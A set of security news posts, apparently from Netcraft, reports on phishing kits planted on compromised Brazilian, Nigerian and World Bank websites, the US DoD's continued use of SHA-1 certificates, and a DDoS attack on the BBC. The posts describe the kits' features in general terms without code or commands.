Brazil Gov website serving up phish and malware… again

A Brazilian government website has been compromised for the third time in less than two months. Each compromise resulted in the site hosting fraudulent content that was used in phishing attacks. One of these attacks also attempted to install drive-by malware on victims' computers.

The first compromise took place in December, when the Prefeitura Municipal de Esperança website was used to host a phishing attack against Wells Fargo bank. The fraudulent content used in this first attack was subsequently removed, but the site was compromised again last week and used to host two more phishing attacks.

The first phishing attack hosted on prefeituradeesperanca.pb.gov.br, which targeted Wells Fargo customers in December 2015.

The second phishing attack, which kicked off last week, was aimed at PayPal customers. This was arguably the most dangerous attack: As well as stealing victims' PayPal credentials and bank details, the phishing kit used in this attack also attempted to inject drive-by malware via hidden iframes.

Fraudsters often use ready-made phishing kits when deploying phishing sites, as it generally makes the process quick and easy. Kits typically consist of a collection of lookalike web pages, scripts and images which simply have to be uploaded to the compromised web server to create a ready-to-go phishing site. In most cases, all the fraudster has to do is edit a simple configuration file to tell the phishing site which email address to send the stolen credentials to.

The PayPal phishing site, which also tried to deliver malware to its victims.

The PayPal phishing site, which also tried to deliver malware to its victims.

The third attack – which is currently still live – uses a phishing kit that is designed to steal webmail credentials. Many slight variations of this kit exist, but all display an error message regardless of the validity of the submitted credentials.

The latest attack attempts to steal webmail credentials.

The latest attack attempts to steal webmail credentials.

Unbeknownst to the victim, the stolen credentials are emailed to the fraudster who deployed the kit; but these webmail phishing kits also contain an additional surprise. The fraudster may not realise that the kit also sends a copy of these stolen credentials to another email address, which presumably belongs to the original author of the kit. This address has been sneakily embedded into the kit in such a way that its presence it unlikely to be spotted by the deploying fraudster.

Webmail credentials are a popular target for phishers, as they can be used to compromised further accounts held by each victim. For example, if the victim's email address has been used to sign up for other services, the attacker might be able to use password resets to gain unauthorised access to those services.

Repeatedly compromised

The .gov.br second-level domain used by the compromised website is reserved for government entities within Brazil, yet the content of the site is physically hosted by HostGator in Texas. It is not unusual for South American governments to host websites in external countries such as the U.S., especially when the sites do not store or process any sensitive data. The most obvious motivation in this case is that hosting costs in the U.S. are typically lower than those in Brazil.

The fact that the website has been repeatedly compromised suggests there is still a vulnerability that allows remote attackers to upload arbitrary content onto the web server. One possible route of compromise could be the "unsafe" version of WordPress being used on www.prefeituradeesperanca.pb.gov.br. The Prefeitura Municipal de Esperança website uses WordPress 4.0.9 as its content management system, and although this version was released only a week ago (to address a cross-site scripting vulnerability), only the latest release in the 4.4.x series is officially actively maintained. The WordPress website explicitly points out that anything older than the current latest release (4.4.1) is not safe to use.

Another potential risk could be the site's reliance on a shared hosting platform: More than 70 other websites are served from the same IP address as that used by www.prefeituradeesperanca.pb.gov.br. Vulnerabilities exposed by any of these non-government sites could potentially be used to attack the government site. Also, in general, any web server that has previously been compromised could have had a backdoor installed by the attacker, making it trivial to gain unauthorised access at a later time.

The PayPal phishing kit

PayPal is one of the most common phishing targets, with many distinct phishing kits making it easy for even novices to carry out these types of attack. Last month alone, Netcraft blocked more than 60,000 phishing URLs that were designed to steal PayPal credentials.

The PayPal phishing kit used in last week's attack featured a few tricks that made it stand out from a typical kit. Although it exhibits a few tell-tale spelling mistakes, the designer of the phishing kit has been very careful in other respects. For example, the initial login page actually consists of a large background image, with two input fields and a submit button overlaid. This means the textual content of the page does not need to be written in the HTML document, which could in turn reduce the likelihood of the attack being spotted and blocked by certain internet security software.

However, this trick does not work too well in all browsers – if you look closely, you can see that the text fields do not quite line up with the placeholders in the background image:

Misaligned login form, with "Payement" spelling mistake.

Misaligned login form, with "Payement" spelling mistake.

The fact that the spelling mistakes are contained within images, rather than within an easily editable HTML document, could explain why subsequent users of this phishing kit have not corrected them.

Spelling mistakes aside, the developer has also implemented validation checks to prevent the login form being submitted with an invalid email address:

email-validation

After stealing the victim's PayPal credentials, the phishing site takes the user through a three-stage "update" process. The first stage collates the victim's full address and date of birth, while the second gathers his payment card details, and the final stage steals his bank account numbers.

Each stage of the phishing attack validates the information entered by the victim.

Each stage of the phishing attack validates the information entered by the victim.

Each page validates the victim's input, and like the spoof login page, they also use background images in an attempt to evade detection.

But the nastiest feature is that each page in the phishing kit contains a set of hidden iframes that attempt to silently install malware on the victim's computer. This is a relatively unusual feature for a phishing kit, and was possibly included to the benefit of the phishing kit's author, rather than to the subordinate fraudsters who deploy it.

The PayPal attack also attempted to inject drive-by malware via iframes. This component of the attack did not work, as the domain used for the malware delivery has been sinkholed.

The PayPal attack also attempted to inject drive-by malware via iframes.

However, the malware component of the attack does not work, as the domain used for the malware delivery has been sinkholed. If it had not already been sinkholed and was still serving drive-by malware, any victim visiting the phishing site could have had his computer compromised as soon as the login page was viewed. If the victim was cautious enough to not submit the login form, the malware might still have allowed the attacker to steal the victim's credentials in other ways, or allow for other monetization opportunities, such as making the victim's computer part of a botnet.

After the victim has submitted his bank account details, the PayPal phishing site indicates that the account has been successfully updated, and redirects the victim to the genuine PayPal login page. Being prompted to enter a username and password a second time could ring alarm bells, as the victim has, ostensibly, already logged in. The phishing site explains away this concern by saying the user must re-login to save the changes.

paypal-relogin

All three of these phishing attacks were added to Netcraft's Phishing Site Feed. This feed is used by all major web browsers and many leading anti-virus and content-filtering companies, so most users are already protected against the latest webmail phishing attack. The fraudulent content used in the first two attacks has been removed from the Prefeitura Municipal de Esperança website.

US military still SHAckled to outdated DoD PKI infrastructure

Despite widespread concerns over the security of the SHA-1 hash algorithm, the US Department of Defense is still issuing SHA-1 signed certificates, and using them to secure connections to .mil websites.

The US DoD issued a SHA-1 signed certificate to necportal.riley.army.mil on 4 January 2016

The US DoD issued a SHA-1 signed certificate to necportal.riley.army.mil on 4 January 2016

Since 1 January 2016, the CA/Browser Forum's Baseline Requirements [pdf] have banned the issuance of new SHA-1 certificates. Publicly-trusted certificate authorities are expected to comply with these Baseline Requirements in order to remain trusted by browsers and operating systems.

However, the US DoD is not a publicly-trusted certificate authority per se, and therefore it does not have to abide by the CA/Browser Forum's rules. With the exception of Apple platforms, most browser software does not include the DoD's root certificates by default. This means any secure site that uses a certificate issued by the DoD is unlikely to be trusted by a browser running on Windows or Linux, unless the user has explicitly installed the DoD's root certificates.

Even though the DoD does not have to abide by the CA/Browser Forum's rules, it is arguably a bad idea not to: The SHA-1 algorithm is now thought to be sufficiently weak that a well-funded attacker might be able to find a SHA-1 hash collision and hence impersonate any HTTPS website. It is also particularly surprising to see the DoD still using SHA-1 today when the US National Institute of Standards and Technology banned its use more than two years ago. Since NIST made this decision, the cost projections of finding a SHA-1 hash collision have reduced significantly.

On 4 January 2016, the DoD issued a SHA-1 certificate to necportal.riley.army.mil [site report], which is a SharePoint portal hosted by the United States Army Information Systems Command. It can be accessed remotely by Common Access Card (CAC) holders. The certificate is marked as being valid until 8 September 2017.

The DoD is America's largest government agency, and is tasked with protecting the security of its country, which makes its continued reliance on SHA-1 particularly remarkable. Besides the well known security implications, this reliance could already prove problematic amongst the DoD's millions of employees. For instance, Mozilla Firefox 43 began rejecting all new SHA-1 certificates issued since 1 January 2016. When it encountered one of these certificates, the browser displayed an Untrusted Connection error, although this could be overridden. If DoD employees become accustomed to ignoring such errors, it could become much easier to carry out man-in-the-middle attacks against them.

However, the latest version of Firefox no longer rejects SHA-1 certificates issued after 1 January 2016. This change was made to cater for users of certain man-in-the-middle products, which generate freshly issued certificates on the fly. Consequently, users of Firefox 43.0.4 who have installed the appropriate DoD root certificates will currently not receive any errors, or even warnings, when browsing to the site:

firefox-necportal

Google intends to block all SHA-1 certificates issued from 1 January 2016 with the release of Chrome 48. In the meantime, Chrome 47 affirmatively distrusts the SHA-1 certificate used by necportal.riley.army.mil because it does not expire until 2017.

Chrome regards the certificate as affirmatively insecure, even when the appropriate DoD root certificates are installed.

Chrome regards the certificate as affirmatively insecure, even when the appropriate DoD root certificates are installed.

Firefox will ultimately distrust all SHA-1 certificates by 2017, regardless of when they were issued, but Mozilla considered advancing this deadline to as early as 1 July 2016 when the new cost projections were realised.

More than 650,000 SSL certificates in use on the web are still using SHA-1, but this count has been rapidly falling since 2014. Nearly all of these certificates are due to expire by the end of 2016, in accordance with the Baseline Requirements; however, with most browser vendors contemplating an accelerated deprecation timeline, it is likely that many of these certificates will be replaced before the middle of the year.

With the US DoD PKI infrastructure seemingly still reliant on SHA-1, by the end of 2017, the DoD could account for a significant proportion of all SHA-1 certificates that are intended to be used by modern browsers.

BBC websites back to normal, DDoS mitigation reverted

The BBC's websites are now back to normal, four days after being taken down by an effective DDoS attack on New Year's Eve.

The BBC mitigated the attack within a few hours by moving its main website onto the Akamai content delivery network, which restored access to its millions of users. However, during this mitigation period, some of the BBC's other websites – which were still hosted at the BBC – remained mostly unreachable.

The BBC's DDoS mitigation was only temporary, and last night it moved its main website off Akamai, back onto a netblock owned by the BBC. This move resulted in another short outage on 4th January, followed by several hours of slightly slower response times within the UK. By the 5th January, the response times had settled down to be almost comparable with when it was using Akamai.

The main BBC website experienced another short outage last night as it moved off the Akamai CDN.

The main BBC website experienced another short outage last night as it moved off the Akamai CDN.

However, as expected, response times from other countries are no longer as fast as they were when the BBC's main website was hosted on the Akamai CDN. Response times from the US are notably slower, but currently no worse than they were before the DDoS attacks on New Year's Eve.

Response times from the US are now much slower again (although international visitors would typically visit bbc.com rather than bbc.co.uk).

Response times from the US are now much slower again (although international visitors would typically visit bbc.com rather than bbc.co.uk).

During the period in which the BBC's main website was hosted on the Akamai CDN, its legacy News website at news.bbc.co.uk remained hosted at the BBC. This was mostly unavailable during this period, with most client connection attempts being reset.

news.bbc.co.uk is now functioning normally, too.

news.bbc.co.uk is now functioning normally, too.

This site's availability was restored to normal at the same time that the main BBC website moved off Akamai. This suggests that the connection resets were a deliberate attempt to mitigate basic DDoS attacks, rather than as a direct side effect of a sustained DDoS attack. However, this approach was not ideal – while some browsers (such as Chrome) would automatically retry the connection attempt (often successfully), other browsers would give up at the first failure.

BBC websites still suffering after DDoS attack

Since suffering a crippling DDoS attack on New Year's Eve, some BBC websites are still experiencing significant performance issues.

Around 07:00 UTC on 31 December 2015, the main BBC website at www.bbc.co.uk was knocked offline after being subjected to a distributed denial of service attack. For the following few hours, requests to the BBC website either eventually timed out, or were responded to with its 500 Internal Error test card page. A group called New World Hacking later claimed responsibility for the attack, which it carried out as a test of its capabilities.

Requests that did not time out were eventually met with the BBC test card error page.

Requests that did not time out were eventually met with the BBC test card error page.

The British Broadcasting Corporation is the public service broadcaster of the United Kingdom, and the outage had a significant impact on its user base: The BBC's news, sport, weather and iPlayer TV and radio catchup services are all delivered via www.bbc.co.uk.

Performance chart for www.bbc.co.uk, showing the primary outage period.

Performance chart for www.bbc.co.uk, showing the primary outage period.

At the time of the attack, www.bbc.co.uk was served from a netblock owned by the BBC. It seems that service was restored by migrating the site onto the Akamai content delivery network, after which there were no apparent outages.

OS Server Last seen IP address Netblock Owner
Linux nginx 3-Jan-2016 88.221.48.170 Akamai
Linux nginx 2-Jan-2016 95.101.129.88 Akamai Technologies
Linux nginx 31-Dec-2015 95.101.129.106 Akamai Technologies
Linux nginx 30-Dec-2015 212.58.244.70 BBC
Linux nginx 29-Dec-2015 212.58.246.54 BBC
Linux nginx 28-Dec-2015 212.58.244.71 BBC

Moving www.bbc.co.uk onto the Akamai CDN also resulted in some significant performance benefits, particularly from locations outside of the UK. For example, prior to the attack, most requests from Netcraft's New York performance collector took around 0.4-0.6 seconds to receive a response, whereas after the site had migrated to Akamai, all requests were served in well under 0.1 seconds. These performance benefits are typical when using a globally distributed CDN, as cached content can be delivered from an edge server within the client's own country, rather than from a remote server that can only be reached via transatlantic cables.

Performance chart for www.bbc.co.uk from  New York, highlighting the improved response times and successful attack  mitigation after switching to Akamai.

Performance chart for www.bbc.co.uk from New York, highlighting the improved response times and successful attack mitigation after switching to Akamai.

However, not all of the BBC's websites have migrated to Akamai, and some of these are still exhibiting connectivity issues in the aftermath of the attack. For example, search.bbc.co.uk and news.bbc.co.uk are still hosted directly at the BBC, and these are still experiencing problems today.

The BBC's News service is currently found at www.bbc.co.uk/news, but up until a few years ago it used to be served from its own dedicated hostname, news.bbc.co.uk. This legacy hostname is still used by some webpages today, but mostly redirects visitors to the new site at www.bbc.co.uk/news. This conveniently collates all of the BBC's main online services under the same hostname, but at the expense of introducing a single point of failure. If each service were still to be found under a different hostname and on different servers, it might have offered further resilience to the initial attack.

The performance chart for news.bbc.co.uk shows massive outages long after the DDoS attack on New Year's Eve.

The performance chart for news.bbc.co.uk shows massive outages long after the DDoS attack on New Year's Eve.

As shown above, news.bbc.co.uk was also affected by the DDoS attack which took down the main BBC website, but eventually came back online later that day without having to relocate the website. However, the following morning (New Year's Day), it started to experience significant connectivity problems.

Most requests to news.bbc.co.uk are still failing.

Most requests to news.bbc.co.uk are still failing. Some browsers, such as Chrome, may automatically retry the request.

It is unclear whether this indicates a separate ongoing attack, or an attempt at mitigating such attacks, but nonetheless, it is likely to affect lots of users: Many old news articles are still served directly from news.bbc.co.uk, and some users habitually reach the news website by typing news.bbc.co.uk into their browsers. Some regularly updated pages also continue to be served from news.bbc.co.uk, such as horse racing results.

World Bank hacked by PayPal phishers

Hackers have broken into a website operated by the World Bank Group, which was subsequently exploited to host a convincing PayPal phishing site. The fraudulent content deployed on the site was able to benefit from the presence of a valid Extended Validation SSL certificate.

Extended Validation certificates can only be issued to organisations that have gone through a stringent set of verification steps, as required by the CA/Browser Forum. To recognise the high level of assurance offered by an EV certificate, most browser software will display the organisation's name in a prominent green box next to the address bar.

A PayPal phishing site, using an Extended Validation SSL certificate issued to the World Bank Group.

A PayPal phishing site, using an Extended Validation SSL certificate issued to the World Bank Group.

The EV vetting process effectively guarantees that the domain used in this attack is operated by the organisation specified in the certificate, which in this case is the World Bank Group. Implicatively, any visitor to this site is likely to trust the content it displays.

But of course, this guarantee goes out the window if the site has been compromised by an attacker. That's exactly what happened on Tuesday, when fraudsters deployed a PayPal phishing site into a directory on climatesmartplanning.org, allowing the fraudulent content to be served with an EV certificate issued to The World Bank Group.

The Climate-Smart Planning Platform is an initiative led by The World Bank, which makes it easier for developing-country practitioners to locate and access the tools, data and knowledge they need for climate-smart planning. Given its noble goals, it seems a shame that its website has been affected by this fraudulent activity.

The day after the attack, the website became temporarily unavailable (displaying only a Red Hat Enterprise Linux test page), before later coming back online with the fraudulent content removed. But today, it became evident that the site is still vulnerable to attack, as its homepage has now been defaced by a group called "Virus iraq".

A World Bank Group website hacked by "Virus iraq".

A World Bank Group website hacked by "Virus iraq" (19 November, 2015).

This is not the only time The World Bank's reputation has been tainted by the work of fraudsters – its name is also often used in 419 scams.

Tuesday's phishing attack started off by asking the victim to enter his or her PayPal email address and password. These credentials were submitted to a logcheck.php script on the server, which carried out some validation to prevent bogus data clogging up the phisher's haul.

The phishing site rejects invalid email addresses.

The phishing site rejects invalid email addresses.

After logging these stolen credentials, the phishing site claims it is temporarily unable to load the user's account. The victim is prompted to confirm their "informations" in order to access their account.

The next page asks for several details that would help the fraudster carry out identity theft. These details include the victim's name, date of birth, address and phone number. After these have been submitted, the victim is prompted to confirm payment card details by entering his full card number, expiry date and CSC (CVV) number.

The previous page also has a checkbox to specify whether or not the victim's card uses Verified by Visa or MasterCard SecureCode. If this box is checked, the next page will prompt the user to enter his 3-D Secure password, thus allowing the attacker to make fraudulent purchases on sites that are are protected by these additional layers of security.

Stealing the victim's 3-D Secure password.

Stealing the victim's 3-D Secure password.

After this final password has been stolen, the victim is redirected to the genuine PayPal website, leaving the attacker with the ability to make fraudulent purchases using either the victim's PayPal account or credit card.

At the time of writing, the Climate-Smart Planning Platform website remains defaced, but the phishing content has been removed.

Nigerian government serving up fresh phish

The Financial Reporting Council of Nigeria is currently serving a webmail phishing site from its own government domain.

The phishing content is based on a ready-to-go phishing kit that is distributed as a zip file. It contains easily-customisable PHP scripts and images designed to trick victims into surrendering either their Yahoo, Gmail, Hotmail or AOL passwords.

Gmail phishing content served from a Nigerian government website.

Gmail phishing content served from a Nigerian government website.

In this case, the kit has been deployed within an images directory on a Nigerian government website at financialreportingcouncil.gov.ng, which suggests that the site may have been compromised by a remote attacker. The same phishing kit has also been used to deploy phishing sites on several other websites over the past nine months.

After a victim enters his or her email credentials into the phishing site, both the username and password are transmitted via email directly to the fraudster. These emails also contain the victim's IP address, and a third-party web service is used to deduce which country the victim is in.

After stealing the victim's email credentials, the phishing site inexplicably redirects the browser to the Saatchi Art investment website at http://explore.saatchiart.com/invest-in-art/. This does not appear to be in any way connected to the fraudulent activity.

One of the PHP scripts found within the phishing kit.

One of the PHP scripts found within the phishing kit.

Unlike conventional phishing attacks against banks, attacks that aim to harvest email credentials typically have no immediate financial return; but access to a single victim's email account can often facilitate unauthorised access to several other accounts. With minimal effort, the fraudster can easily discover which websites the victim uses, and then submit password reset requests to those websites. As a bonus, the compromised email account can also be abused to send phishing emails to additional victims, as well as providing a source of valid email addresses.

The majority of Nigeria's government websites, including the one operated by the Financial Reporting Council, are hosted in the United States. It is not apparent how the phishing content has ended up on financialreportingcouncil.gov.ng, although one possible route of compromise could be the unsupported Joomla! CMS software installed on the server. It is still using Joomla! 2.5.28, which reached End of Life status at the end of 2014, meaning that it no longer receives security updates or bug fixes.

However, the Joomla! Security Centre does not document any publicly-known vulnerabilities that affect version 2.5.28. Nonetheless, the use of unsupported software on a public-facing website often catches the attention of hackers, as it is generally indicative of poor security practices elsewhere, and thus attracts further scrutiny. Unless the server was compromised via an undocumented 0-day vulnerability in Joomla!, it may well have been compromised via a different route.